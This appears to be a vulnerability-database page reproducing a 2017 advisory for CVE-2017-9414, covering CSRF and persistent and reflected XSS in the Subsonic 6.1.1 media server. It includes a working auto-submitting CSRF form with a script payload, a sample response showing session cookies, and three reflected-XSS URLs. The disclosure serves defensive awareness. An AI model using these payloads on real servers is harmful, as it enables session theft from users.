Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Subsonic 6.1.1 - Cross-Site Request Forgery / Cross-Site Scripting Vulnerabilities

🗓️ 05 Jun 2017 00:00:00Reported by hyp3rlinxType 
zdt
 zdt🔗 0day.today👁 31 Views

Subsonic v6.1.1 CSRF & Persistent XS

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2017-9414
5 Jun 201700:00
circl
CNVD		Subsonic Cross-Site Scripting Vulnerability
7 Jun 201700:00
cnvd
CVE		CVE-2017-9414
5 Feb 201816:00
cve
Cvelist		CVE-2017-9414
5 Feb 201816:00
cvelist
Exploit DB		Subsonic 6.1.1 - Cross-Site Request Forgery / Cross-Site Scripting
5 Jun 201700:00
exploitdb
EUVD		EUVD-2017-18349
7 Oct 202500:30
euvd
exploitpack		Subsonic 6.1.1 - Cross-Site Request Forgery Cross-Site Scripting
5 Jun 201700:00
exploitpack
NVD		CVE-2017-9414
5 Feb 201816:29
nvd
OSV		CVE-2017-9414
5 Feb 201816:29
osv
Packet Storm		Subsonic 6.1.1 Persistent XSS
3 Jun 201700:00
packetstorm
Rows per page
[+] Credits: John Page a.k.a hyp3rlinx  

 
Vendor:
================
www.subsonic.org
 
 
 Product:
===============
subsonic v6.1.1
 
Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
  
 
Vulnerability Type:
======================
CSRF - Persistent XSS
 
  
CVE Reference:
==============
CVE-2017-9414
 
 
 
Security Issue:
================
Remote attackers can abuse the Subscribe to Podcast feature of subsonic to store persistent XSS payloads 
if an authenticated user clicks a malicious link or visits an attacker controlled webpage. 
 
 
 
Exploit/POC:
=============
<form action="http://localhost:4040/playerSettings.view" method="post">
<input name="playerId" type="hidden" value="1">
<input name="name" type="text" value="<script>alert('XSS ' +document.cookie)</script>">
<script>document.forms[0].submit()</script>
</form>
 
Then visit http://localhost:4040/index.view
 
HTTP Response:
XSS JSESSIONID=1n631ex230ljs; player-61646d696e=1; DWRSESSIONID=!hqFsK!BCyup7gBQU8spRLvw0tBacefl9Nl
 
 
Misc Reflected:
 
XSS 1
http://localhost:4040/avatar.view?id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
 
XSS 2
http://localhost:4040//userChart.view?type=%3Cscript%3Ealert(document.cookie)%3C/script%3E
 
XSS 3
http://localhost:4040/coverArt.view?size=%3Cscript%3Ealert(123)%3C/script%3E

#  0day.today [2018-01-04]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 Jun 2017 00:00Current
8.7High risk
Vulners AI Score8.7
EPSS0.02293
subsonic media servercross-site request forgerypersistent xsscve-2017-9414remote attackerssubscribe to podcastexploit/poc
31